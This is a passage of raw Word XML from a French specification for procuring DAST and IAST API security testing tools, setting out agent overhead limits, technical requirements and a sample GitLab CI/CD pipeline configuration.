              <w:t xml:space="preserve">    CORECLR_ENABLE_PROFILING: '1'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CORECLR_PROFILER: '{IAST-PROFILER-GUID}'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    CORECLR_PROFILER_PATH: /opt/iast/iast_profiler.so</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    IAST_API_KEY: $IAST_API_KEY</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  script: [dotnet test]</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6.5   Overhead et contraintes de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000"/>
        <w:gridCol w:w="2026"/>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Langage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Overhead CPU attendu</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Overhead mémoire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 latence tests</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Acceptable benchmark</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Java</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8%</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+ 50-150 MB heap</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10% temps exécution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Python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+ 20-50 MB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12%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Node.js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8%</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+ 30-80 MB</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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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+ 40-100 MB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10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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Go</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+ 10-30 MB</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5%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="20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PHP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+ 20-40 MB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&lt; 15%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="202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Vérifier</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single" w:color="1E6B3C" w:sz="1"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="1"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="D9EAD3"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Recommandation : exiger une mesure d’overhead documentée et reproductible lors du benchmark, sur un cas de test représentatif de chaque langage du parc. L’overhead en mode test est acceptable ; l’overhead en production (si agent activé en RUN) doit faire l’objet d’une évaluation séparée.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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7   Exigences Techniques</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7.1   Contraintes d’environnement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Les outils de découverte / contrôles ne doivent pas provoquer de déni de service sur le périmètre des API ou être agencés de manière incohérente avec l’affluence d’usage. (DEB – section 2.2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40" w:before="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Données générées par les outils — classification DICT :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D:1 — Contrôles mensuels ou hebdomadaires FCI, ou à la demande</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I:3 — Projet de fiabilisation de l’information</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C:3 — Données de sécurité, d’inventaire ou de cartographie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">T:3 — Traçabilité des actions réalisées sur les outils et données</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7.2   Tableau des exigences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5200"/>
        <w:gridCol w:w="1466"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Domaine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5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Exigence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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Niveau</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ET-01</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Protocoles &amp; formats</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Support REST/JSON, SOAP/XML (obligatoire). GraphQL SDL, gRPC protobuf, WebSocket, AsyncAPI, MQTT, AMQP (recommandé). TLS 1.2 minimum, TLS 1.3 recommandé.</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Multi-langages IAST</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Agent IAST pour : Java (JVM 8+), Python (3.8+), Node.js (16+), .NET Core (6+). Support Go et PHP recommandé. Zéro modification du code source.</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ET-03</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Intégration GitLab CI/CD</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Template job réutilisable via include. Support stages .pre/build/test/security-scan/publish. Compatible needs + artifacts dotenv. GitLab CE Free tier.</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Authentification APIs cibles</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OAuth2/OIDC (client credentials + auth code), Bearer JWT avec refresh, API Key, mTLS, Basic Auth. Token refresh mid-scan obligatoire.</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ET-05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 résultats / exports</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 REST résultats (JSON). Export SARIF (GitLab Dashboard), CycloneDX, HTML/PDF personnalisable, CSV. Rapport différentiel natif.</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ET-06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Non-intrusivité</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Rate limiting configurable (DAST CI/CD : 20 req/s max, On-Demand : 5 req/s). Circuit breaker si taux erreur &gt; 5%. Plage horaire configurable.</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ET-07</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Couverture OWASP API Top10:2023</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BOLA, Broken Auth, BOPLA, URC, BFLA, UASF, SSRF, Security Misconfig, Improper Inventory, Unsafe Consumption. Démonstration exigée lors du benchmark.</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ET-08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Gestion FP persistante</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Baseline FP versionnable en Git. Workflow triage (Confirmed/FP/Accepted/Fixed). Exclusion par pattern, type de vuln, code HTTP. Règles custom.</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ET-09</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Planification scans FCI</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Scans hebdomadaires automatisés sur APIs tag FCI. Scheduler intégré ou via GitLab cron. Rapport asynchrone.</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Secrets management</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Intégration vault (CyberArk, HashiCorp Vault) pour les secrets On-Demand prod. Variables GitLab CI/CD protégées/masquées pour CI/CD.</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ET-11</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Overhead IAST</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CPU &lt; 10%, mémoire documentée par langage, impact latence &lt; 15%. Mesure reproductible lors du benchmark.</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Sécurité du composant</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Accès restreint, authentification forte, journalisation des accès. Données C:3. L’outil lui-même doit être audité (pas de shadow IT).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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ET-13</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Scalabilité</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Capacité de scanner plusieurs centaines d’APIs. Parallélisation des scans. Pas d’agent unique bloquant.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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ET-14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Source mapping IAST</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Affichage de la ligne de code exacte (si source disponible). Désactivable en production.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="146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r>
    </w:tbl>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8   Prérequis d’Intégration GitLab CI/CD</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8.1   Architecture cible du pipeline de sécurité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Le pipeline GitLab intégrant DAST/IAST s’organise selon la logique BUILD (IAST) / RUN (DAST on-demand) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `.pre` : vérification conformité (inclusion template centralisé, politique sécurité)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `build` : compilation + packaging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `test` : exécution des tests avec agent IAST injecté (résultats temps réel)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `deploy-staging` : déploiement sur env. isolé</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `security-dast` : scan DAST sur l’endpoint déployé (gate bloquant sur CRITICAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="60" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage `publish` : SARIF → GitLab Security Dashboard + notification VOC</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8.2   Tableau des prérequis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4560"/>
        <w:gridCol w:w="2106"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="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Prérequis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Attendu technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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PR-01</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Runner GitLab dédié</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Runner avec accès réseau aux envs cibles. Tags : security-scan, dast-runner. Docker executor obligatoire. Isolé du runner de build standard.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Architecte Infra / DEVSEC</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Variables CI/CD sécurisées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Credentials de scan (tokens, API Keys, secrets OAuth2) dans GitLab CI/CD Variables protégées et masquées. Scope par environnement. Jamais en clair dans .gitlab-ci.yml.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / SecByDesign</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PR-03</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Template centralisé</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Template dans repo_centralised_secure. Include via include: project. Versionné. Maintenu par équipe sécurité. Compatible needs + dotenv artifacts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Equipe Sécurité API</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Stage security-scan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Stage dédié après deploy-staging. Timeout 20 min strict. Gate bloquant CRITICAL. Séparation IAST (test) / DAST (security-scan).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / MOA</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PR-05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Connectivité réseau</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DNS + port 80/443 entre runner et API cible. Proxy configuré si env fermé. Runner DAST en DMZ interne si nécessaire.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Architecte Infra</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PR-06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Artifacts et rapports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Rapports SARIF en artifacts GitLab (TTL 90 jours). GitLab Security Dashboard activé. Export VOC via webhook ou API REST.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / VOC</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PR-07</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Gate et politique blocage</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Seuil CRITICAL bloquant. HIGH en avertissement. Configurable par env et par tag API (FCI / non-FCI). Dérogation via approved exception.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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MOA / SSI</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PR-08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Coexistence SonarQube / Xray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Pas de conflit de stage. Résultats consolidés dans le rapport sécurité global. SCA (SDepend/Xray) + SAST (Sonar) + DAST + IAST = couverture complète.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / SecByDesign</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PR-09</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Spec OpenAPI versionnée</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Spec API (openapi.yaml) versionnée en repo. Variable DAST_API_SPECIFICATION configurée. Coverage-driven activé si spec présente.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="210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Equipe Dev / MOA</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Traçabilité scans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Timestamp, branche, commit SHA, résultats journalisés. Rétention logs 1 an (DICT T:3). Lien vers le pipeline GitLab dans chaque rapport.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="21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DCS / SSI</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8.3   Structure `.gitlab-ci.yml` de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DD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">include:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - project: 'lb-group6285803/repo_centralised_secure'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    file: 'templates/security/dast-iast.gitlab-ci.yml'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    ref: 'main'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">stages:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - .pre             # conformité pipeline</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - build</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - test             # IAST actif ici (agent injecté dans les tests)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - deploy-staging</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - security-dast    # DAST post-deploy</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  - publish</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_TARGET_URL:        $CI_ENVIRONMENT_URL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_API_SPEC:          openapi.yaml</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_AUTH_TOKEN:        $DAST_SECRET_TOKEN    # variable protégée/masquée</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_SEVERITY_THRESHOLD: CRITICAL</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  DAST_RATE_LIMIT:        20                    # req/s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  IAST_SERVER_URL:        $IAST_SERVER_URL      # variable protégée</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  IAST_API_KEY:           $IAST_API_KEY         # variable masquée</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Surcharge possible par projet (override du template)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">dast-scan:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">  variables:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="CDD6F4"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve">    DAST_EXCLUDE_URLS: '/actuator,/health,/swagger-ui'</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
